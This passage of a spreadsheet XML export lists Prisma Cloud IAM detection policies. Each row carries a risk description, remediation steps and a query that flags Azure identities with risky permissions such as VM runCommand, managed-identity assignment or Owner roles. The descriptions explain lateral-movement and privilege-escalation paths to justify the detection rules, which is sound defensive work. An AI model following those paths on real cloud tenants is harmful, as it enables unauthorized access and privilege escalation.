          <t>Identifies users which have administrative permissions that have not been used in the last 90 days. Users with administrative permissions are considered a valuable target for adversaries, and as such, it is good practice to limit them as much as possible.</t>
        </is>
      </c>
      <c r="X3061" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, take note of the "Asset Name". Then select the "Alert ID", then "Investigate"
2. In the results, you will see the policy granting unused administrative permissions to the user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determining which permissions are unnecessary and can be removed based on their last usage, in order to remove them, use the following remediation steps:
Log in to your Cloud instance, navigate to the affected user, and edit the user's permissions following the principle of least privilege and based on the information collected.</t>
        </is>
      </c>
      <c r="Y306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cli commands'</t>
        </is>
      </c>
      <c r="Z3061" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.resource.type = 'user' AND action.access.isAdministrative = true AND action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3061" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3061" t="inlineStr">
        <is>
          <t>2024-08-02 06:28:14</t>
        </is>
      </c>
      <c r="AC3061" t="inlineStr"/>
      <c r="AD3061" t="b">
        <v>1</v>
      </c>
      <c r="AE3061" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3061" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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1" t="inlineStr">
        <is>
          <t>6d12f443-a0a3-4f2a-97ee-4be065612bd8</t>
        </is>
      </c>
      <c r="AI3061" t="inlineStr">
        <is>
          <t>6d12f443-a0a3-4f2a-97ee-4be065612bd8</t>
        </is>
      </c>
      <c r="AJ3061" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3061" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3062">
      <c r="A3062" t="inlineStr"/>
      <c r="B3062" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3062" s="2" t="inlineStr"/>
      <c r="D3062" t="n">
        <v>0</v>
      </c>
      <c r="E3062" t="n">
        <v>573</v>
      </c>
      <c r="F3062" t="n">
        <v>0</v>
      </c>
      <c r="G3062" t="b">
        <v>1</v>
      </c>
      <c r="H30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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3062" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3062" t="inlineStr">
        <is>
          <t>Cloud service account with excessive admin privileges</t>
        </is>
      </c>
      <c r="L3062" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3062" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3062" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3062" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3062" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3062" t="inlineStr"/>
      <c r="R3062" t="inlineStr"/>
      <c r="S3062" t="inlineStr"/>
      <c r="T3062" t="b">
        <v>1</v>
      </c>
      <c r="U3062" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3062" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3062" t="inlineStr">
        <is>
          <t>Identifies cloud service accounts in Azure, AWS and GCP which have administrative permissions that have not been used in the last 90 days. As opposed to user accounts, service accounts are predictable. Therefore, if a service account has administrative permissions which it has not used in the past 90 days, we can confidently say it does not require them, and remove the permissions, decreasing the blast radius in case of a compromise of the service account.</t>
        </is>
      </c>
      <c r="X3062" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select "Asset Name" and take note of the "Name" and "Asset Type", then exit the tab. Select the "Alert ID", then "Investigate"
2. In the results, you will see the service account attached to the asset ("Granted By Entity"), the policy granting unused administrative permissions to the service account ("Granted By Policy"), the specific unused permissions ("Destination"), and the last recorded event when the permissions were used by the user ("Last Access"). Prisma Cloud's event tracking period begins upon onboarding. As such, depending on the onboarding date, further investigation may be required using the cloud provider logs to determine last access
Once examining the permissions and determining which permissions are unnecessary and can be removed based on their last usage, in order to remove them, use the following remediation steps:
Log in to your Cloud instance, and navigate to the affected service account, and edit the entity's permissions following the principle of least privilege and based on the information collected.</t>
        </is>
      </c>
      <c r="Y306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cli commands'</t>
        </is>
      </c>
      <c r="Z3062" t="inlineStr">
        <is>
          <t>config from iam where grantedby.cloud.entity.type IN ('service principal', 'system assigned', 'user assigned', 'serviceaccount', 'role') AND action.access.isAdministrative = true AND action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3062" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3062" t="inlineStr">
        <is>
          <t>2024-08-02 06:28:14</t>
        </is>
      </c>
      <c r="AC3062" t="inlineStr"/>
      <c r="AD3062" t="b">
        <v>1</v>
      </c>
      <c r="AE3062" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3062" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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2" t="inlineStr">
        <is>
          <t>5294bde9-0550-4b6c-a318-914ea90ccaeb</t>
        </is>
      </c>
      <c r="AI3062" t="inlineStr">
        <is>
          <t>5294bde9-0550-4b6c-a318-914ea90ccaeb</t>
        </is>
      </c>
      <c r="AJ3062" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3062" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3063">
      <c r="A3063" t="inlineStr"/>
      <c r="B3063" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3063" s="2" t="inlineStr"/>
      <c r="D3063" t="n">
        <v>0</v>
      </c>
      <c r="E3063" t="n">
        <v>11</v>
      </c>
      <c r="F3063" t="n">
        <v>0</v>
      </c>
      <c r="G3063" t="b">
        <v>1</v>
      </c>
      <c r="H30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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3063" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3063" t="inlineStr">
        <is>
          <t>Azure Lateral Movement via VM Command Execution Leveraging Managed Identity</t>
        </is>
      </c>
      <c r="L3063" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M3063" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3063" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3063" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3063" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3063" t="inlineStr"/>
      <c r="R3063" t="inlineStr"/>
      <c r="S3063" t="inlineStr"/>
      <c r="T3063" t="b">
        <v>1</v>
      </c>
      <c r="U3063" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3063" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3063" t="inlineStr">
        <is>
          <t>Using this permission allows code execution on any virtual machine in the subscription, with ''Microsoft.Compute/virtualMachines/runCommand/action'' an adversary can use the assigned managed-identity connected to the VMs and move laterally between Vnets, environments and resources from the accessed VM.</t>
        </is>
      </c>
      <c r="X3063"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identity and the role with permissions to Microsoft.Compute
 6. Remove the assignment or change the permissions of the role
 7. Create a new assignment with built-in or custom role without risky permissions and/or scoped down to only VMs that this identity requires access to, if necessary</t>
        </is>
      </c>
      <c r="Y306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63" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' AND action.name = 'Microsoft.Compute/virtualMachines/runCommand/action' AND grantedby.level.type = 'Azure Subscription'</t>
        </is>
      </c>
      <c r="AA3063" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3063" t="inlineStr">
        <is>
          <t>2024-10-30 17:00:50</t>
        </is>
      </c>
      <c r="AC3063" t="inlineStr"/>
      <c r="AD3063" t="b">
        <v>1</v>
      </c>
      <c r="AE3063" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3063" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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3" t="inlineStr">
        <is>
          <t>59f32bc9-5750-4821-b663-0c5b07ba3f85</t>
        </is>
      </c>
      <c r="AI3063" t="inlineStr">
        <is>
          <t>59f32bc9-5750-4821-b663-0c5b07ba3f85</t>
        </is>
      </c>
      <c r="AJ3063" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3063" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3064">
      <c r="A3064" t="inlineStr"/>
      <c r="B3064" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3064" s="2" t="inlineStr"/>
      <c r="D3064" t="inlineStr"/>
      <c r="E3064" t="inlineStr"/>
      <c r="F3064" t="inlineStr"/>
      <c r="G3064" t="b">
        <v>1</v>
      </c>
      <c r="H30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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3064" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3064" t="inlineStr">
        <is>
          <t>Azure AD Groups, Service Principals and Managed Identities with IAM Metadata Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3064" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3064" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3064" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3064" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3064" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3064" t="inlineStr"/>
      <c r="R3064" t="inlineStr"/>
      <c r="S3064" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3064" t="b">
        <v>0</v>
      </c>
      <c r="U3064" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3064" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3064" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD Groups, Service Principals, and Managed Identities with Stale IAM Effective Data Write Permissions.
Risk of Unused Data Write Permissions:
Unused Azure AD groups, service principals, and managed identities with IAM effective Data Write permissions for 90 days pose a significant security threat because:
Unsecured Access Point: These identities act like forgotten open doors with high-level access. If compromised, attackers can directly modify or delete sensitive data stored in Azure Blob storage, Azure SQL databases, or other Azure services. This could lead to severe disruption, data breaches, or financial losses.
Elevated Attack Potential: Data Write permissions grant attackers the ability to manipulate core information. They could tamper with databases, alter financial records, or corrupt other critical data, leading to significant consequences.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused Azure AD groups, service principals, and managed identities with any level of IAM effective Data Write permissions (Read or Write) on a regular basis.
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning Azure RBAC permissions. Grant only the minimum level of Data Write access required for an identity to function effectively. Evaluate if alternative methods, like Azure Active Directory Conditional Access or Azure Key Vault access policies, can restrict access to specific data sets or services.
Monitor for Data Anomalies: Implement Azure Monitor and Azure Sentinel to monitor data access attempts and changes within your Azure services. This vigilance can help detect unusual activity related to unused identities that might indicate a compromise and data tampering.</t>
        </is>
      </c>
      <c r="X3064"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64" t="inlineStr"/>
      <c r="Z3064" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and grantedby.cloud.entity.type NOT IN ('user') and action.access.level = 'Metadata Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3064" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3064" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3064" t="inlineStr"/>
      <c r="AD3064" t="b">
        <v>1</v>
      </c>
      <c r="AE3064" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3064" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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4" t="inlineStr">
        <is>
          <t>99f7dc0a-b0b9-496d-a8a1-606d83df21f5</t>
        </is>
      </c>
      <c r="AI3064" t="inlineStr">
        <is>
          <t>99f7dc0a-b0b9-496d-a8a1-606d83df21f5</t>
        </is>
      </c>
      <c r="AJ3064" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3064" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3065">
      <c r="A3065" t="inlineStr"/>
      <c r="B3065" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3065" s="2" t="inlineStr"/>
      <c r="D3065" t="inlineStr"/>
      <c r="E3065" t="inlineStr"/>
      <c r="F3065" t="inlineStr"/>
      <c r="G3065" t="b">
        <v>1</v>
      </c>
      <c r="H30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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3065" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3065" t="inlineStr">
        <is>
          <t>Azure VM instance with database management write access permissions</t>
        </is>
      </c>
      <c r="L3065" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3065" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3065" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3065" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3065" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3065" t="inlineStr"/>
      <c r="R3065" t="inlineStr"/>
      <c r="S3065" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3065" t="b">
        <v>1</v>
      </c>
      <c r="U3065" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3065" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3065" t="inlineStr">
        <is>
          <t>The policy restricts write access of Azure's VM instances to DB aiming to prevent unauthorized modifications to critical database services hosted on Azure. It enhances security by enforcing granular access control and aligning with the principle of least privilege.</t>
        </is>
      </c>
      <c r="X3065" t="inlineStr">
        <is>
          <t>"Remediation steps:
1. Sign in to the Azure Management Console.
2. Navigate to the Azure Subscriptions blade by visiting https://portal.azure.com/#blade/Microsoft_Azure_Billing/SubscriptionsBlade.
3. Click on the Azure cloud subscription that you want to examine
4. Navigate to the “Resources”
5. Locate the VM instance that is violating the policy.
6. In the navigation panel, choose "Access control (IAM)" and select the "Role Assignments" tab to access the role bindings for the selected subscription
7. Identify the assignment between the VM and the role that grants permissions for database management write access
8. Remove the assignment associated with the VM and the role with database management write access permissions
9. If necessary, create a new assignment using a built-in or custom role that does not include risky permissions for database management write access
"</t>
        </is>
      </c>
      <c r="Y306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65" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' AND source.cloud.type = 'AZURE' AND source.cloud.service.name = 'Microsoft.Compute' AND source.cloud.resource.type = 'VirtualMachines' and action.name IN ('Microsoft.Cache/redisEnterprise/databases/write','Microsoft.DataMigration/databaseMigrations/write','Microsoft.DBforMariaDB/servers/databases/write','Microsoft.DBforMySQL/flexibleServers/databases/write','Microsoft.DBforMySQL/servers/databases/write','Microsoft.DBforPostgreSQL/flexibleServers/databases/write','Microsoft.DBforPostgreSQL/servers/databases/write','Microsoft.DocumentDB/databaseAccounts/write','Microsoft.Sql/managedInstances/databases/write','Microsoft.Sql/servers/databases/write','Microsoft.SqlVirtualMachine/sqlVirtualMachines/write')</t>
        </is>
      </c>
      <c r="AA3065" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3065" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3065" t="inlineStr"/>
      <c r="AD3065" t="b">
        <v>1</v>
      </c>
      <c r="AE3065" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3065" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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5" t="inlineStr">
        <is>
          <t>7477a38d-d4a4-4a26-b288-d97e1dd110ac</t>
        </is>
      </c>
      <c r="AI3065" t="inlineStr">
        <is>
          <t>7477a38d-d4a4-4a26-b288-d97e1dd110ac</t>
        </is>
      </c>
      <c r="AJ3065" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3065" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3066">
      <c r="A3066" t="inlineStr"/>
      <c r="B3066" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3066" s="2" t="inlineStr"/>
      <c r="D3066" t="inlineStr"/>
      <c r="E3066" t="inlineStr"/>
      <c r="F3066" t="inlineStr"/>
      <c r="G3066" t="b">
        <v>1</v>
      </c>
      <c r="H30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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3066" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3066" t="inlineStr">
        <is>
          <t>Azure VM instance associated managed identity with Azure built-in roles of Owner permissions</t>
        </is>
      </c>
      <c r="L3066" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3066" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3066" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3066" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3066" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3066" t="inlineStr"/>
      <c r="R3066" t="inlineStr"/>
      <c r="S3066" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3066" t="b">
        <v>1</v>
      </c>
      <c r="U3066" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3066" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3066" t="inlineStr">
        <is>
          <t>With 'built-in Owner' role an adversary can elevate the access of the VM instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X3066"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VM from the list</t>
        </is>
      </c>
      <c r="Y306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66" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Owner' AND source.cloud.service.name = 'Microsoft.Compute'</t>
        </is>
      </c>
      <c r="AA3066" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3066" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3066" t="inlineStr"/>
      <c r="AD3066" t="b">
        <v>1</v>
      </c>
      <c r="AE3066" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3066" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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6" t="inlineStr">
        <is>
          <t>4e358d63-0d3f-4ed2-aac0-e1667402df46</t>
        </is>
      </c>
      <c r="AI3066" t="inlineStr">
        <is>
          <t>4e358d63-0d3f-4ed2-aac0-e1667402df46</t>
        </is>
      </c>
      <c r="AJ3066" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3066" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3067">
      <c r="A3067" t="inlineStr"/>
      <c r="B3067" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3067" s="2" t="inlineStr"/>
      <c r="D3067" t="inlineStr"/>
      <c r="E3067" t="inlineStr"/>
      <c r="F3067" t="inlineStr"/>
      <c r="G3067" t="b">
        <v>1</v>
      </c>
      <c r="H30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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3067" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3067" t="inlineStr">
        <is>
          <t>Azure AD Groups, Service Principals and Managed Identities with Administrative Permissions</t>
        </is>
      </c>
      <c r="L3067" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3067" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3067" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3067" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3067" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3067" t="inlineStr"/>
      <c r="R3067" t="inlineStr"/>
      <c r="S3067" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3067" t="b">
        <v>0</v>
      </c>
      <c r="U3067" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3067" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3067" t="inlineStr">
        <is>
          <t>This policy identifies Azure AD Groups, Service Principals, and Managed Identities with Azure RBAC Administrative Permissions.
Risk of Administrative Permissions:
Azure AD groups, service principals, and managed identities with active Azure RBAC administrative permissions (elevated permissions) pose a significant security risk because:
Broad Access Potential: Unlike individual users with specific credentials, groups, service principals, and managed identities can grant administrative access to a wider pool of users or applications, increasing the attack surface. If compromised, attackers can exploit these entities to gain control over a larger number of accounts and resources.
Misuse by Assigned Users/Applications: Even with proper vetting, there's always a risk that users assigned to an administrative group or service principal might misuse their access unintentionally or through social engineering attacks. Similarly, compromised service principals or misconfigured managed identities could be exploited for malicious purposes.
Mitigating the Risk:
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning Azure RBAC permissions. Grant administrative access only to groups, service principals, and managed identities that absolutely require it. Regularly review and adjust permissions to minimize the scope of access.
Minimize Group and Service Principal Membership: Limit the number of users or applications assigned to groups or service principals with administrative permissions. This reduces the potential impact of a compromise and simplifies access management.
Use Conditional Access for Users: Implement Azure AD Conditional Access to restrict access for users belonging to administrative groups based on factors like location, device type, or real-time threat intelligence. This adds an extra layer of security beyond standard MFA requirements.
Managed Identity Access Restrictions: For managed identities, utilize Azure Resource Manager (ARM) templates or Azure policies to restrict access to specific resource groups, subscriptions, or resources. This helps limit the potential damage if a managed identity is compromised.
Service Principal Permissions Review: Regularly review service principal registrations and assigned permissions, especially those with administrative privileges. Ensure service principals have only the minimum set of permissions required for their intended function.
Monitor for Suspicious Activity: Utilize Azure Monitor to track activity logs, including actions performed by users, service principals, and managed identities with administrative permissions. This vigilance can help detect unusual activity related to these entities that might indicate a compromise.
Regular Review and Auditing: Regularly review Azure AD group memberships, service principal registrations, and managed identity access assignments, especially those with administrative permissions. Conduct periodic security audits to identify potential weaknesses in your Azure RBAC configuration.</t>
        </is>
      </c>
      <c r="X3067"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67" t="inlineStr"/>
      <c r="Z3067" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' and grantedby.cloud.entity.type NOT IN ('user')  and action.access.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3067" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3067" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3067" t="inlineStr"/>
      <c r="AD3067" t="b">
        <v>1</v>
      </c>
      <c r="AE3067" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3067" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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7" t="inlineStr">
        <is>
          <t>a2475c99-1a9c-4f43-a949-4d9d96003126</t>
        </is>
      </c>
      <c r="AI3067" t="inlineStr">
        <is>
          <t>a2475c99-1a9c-4f43-a949-4d9d96003126</t>
        </is>
      </c>
      <c r="AJ3067" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3067" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3068">
      <c r="A3068" t="inlineStr"/>
      <c r="B3068" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3068" s="2" t="inlineStr"/>
      <c r="D3068" t="inlineStr"/>
      <c r="E3068" t="inlineStr"/>
      <c r="F3068" t="inlineStr"/>
      <c r="G3068" t="b">
        <v>1</v>
      </c>
      <c r="H30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68" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3068" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3068" t="inlineStr">
        <is>
          <t>Azure Compute Resource Assigned Managed Identity Assignment Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3068" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3068" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3068" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3068" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3068" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3068" t="inlineStr"/>
      <c r="R3068" t="inlineStr"/>
      <c r="S3068" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3068" t="b">
        <v>1</v>
      </c>
      <c r="U3068" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3068" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3068" t="inlineStr">
        <is>
          <t>An adversary able to assign managed identities could assign them to themselves, obtaining the additional permissions granted to the managed identity, escalating their privileges within the environment. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3068" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to Azure Console
 2.Navigate to the Compute instance, and remove the attached role, or edit it and remove the excessive permissions.</t>
        </is>
      </c>
      <c r="Y306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68" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' AND source.cloud.type = 'AZURE' AND source.cloud.service.name = 'Microsoft.Compute' AND source.cloud.resource.type = 'VirtualMachines' and action.name = 'Microsoft.ManagedIdentity/userAssignedIdentities/assign/action'</t>
        </is>
      </c>
      <c r="AA3068" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3068" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3068" t="inlineStr"/>
      <c r="AD3068" t="b">
        <v>1</v>
      </c>
      <c r="AE3068" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3068" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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68" t="inlineStr">
        <is>
          <t>da59c5d9-da55-49bc-a546-e3e09f3d0105</t>
        </is>
      </c>
      <c r="AI3068" t="inlineStr">
        <is>
          <t>da59c5d9-da55-49bc-a546-e3e09f3d0105</t>
        </is>
      </c>
      <c r="AJ3068" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3068" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3069">
      <c r="A3069" t="inlineStr"/>
      <c r="B3069" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3069" s="2" t="inlineStr"/>
      <c r="D3069" t="inlineStr"/>
      <c r="E3069" t="inlineStr"/>
      <c r="F3069" t="inlineStr"/>
      <c r="G3069" t="b">
        <v>1</v>
      </c>
      <c r="H30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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3069" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3069" t="inlineStr">
        <is>
          <t>VM/Serverless can impersonate an Entra ID application with read access to Microsoft 365 files/Outlook mail</t>
        </is>
      </c>
      <c r="L3069" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3069" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3069" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3069" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3069" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3069" t="inlineStr"/>
      <c r="R3069" t="inlineStr"/>
      <c r="S3069" t="inlineStr"/>
      <c r="T3069" t="b">
        <v>1</v>
      </c>
      <c r="U3069" t="inlineStr">
